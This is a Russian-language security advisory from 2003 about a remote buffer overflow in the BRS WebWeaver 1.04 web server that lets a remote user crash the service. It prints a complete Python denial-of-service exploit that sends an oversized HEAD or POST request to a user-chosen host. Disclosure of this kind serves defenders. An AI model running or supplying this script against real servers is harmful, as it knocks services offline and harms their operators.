Удаленное переполнение буфера в BRS WebWeaver + эксплоит

Дата публикации:
30.05.2003
Всего просмотров:
908
Опасность:
Средняя
Наличие исправления:
Да
Количество уязвимостей:
1
CVSSv2 рейтинг:
CVE ID:
Нет данных
Вектор эксплуатации:
Удаленная
Воздействие:
Отказ в обслуживании
CWE ID:
Нет данных
Наличие эксплоита:
Нет данных
Уязвимые продукты:
Microsoft Windows 98
Microsoft Windows 98 Second Edition
BRS WebWeaver 1.x
Описание: Два переполнения буфера обнаружены в BRS WebWeaver. Удаленный пользователь может аварийно завершить работу web сервиса.

F0KP сообщает, что удаленный пользователь может послать 32700 символов в HTTP POST или HEAD запросе, чтобы аварийно завершить работу Web сервиса.

Эксплоит:

#! /usr/bin/env python
###
# WebWeaver 1.04 Http Server DoS exploit 
# by euronymous /f0kp [http://f0kp.iplus.ru]
########
# Usage: ./fadvWWhtdos.py
########

import sys
import httplib

met = raw_input("""
What kind request you want make to crash webweaver?? [ HEAD/POST ]: 
""")
target = raw_input("Type your target hostname [ w/o http:// ]: ")
spl = "f0kp"*0x1FEF
conn = httplib.HTTPConnection(target)
conn.request(met, "/"+spl)
r1 = conn.getresponse()
print r1.status
Уязвимость обнаружена в BRS WebWeaver 1.04

Ссылки: BRS WebWeaver: POST and HEAD Overflaws
или введите имя

CAPTCHA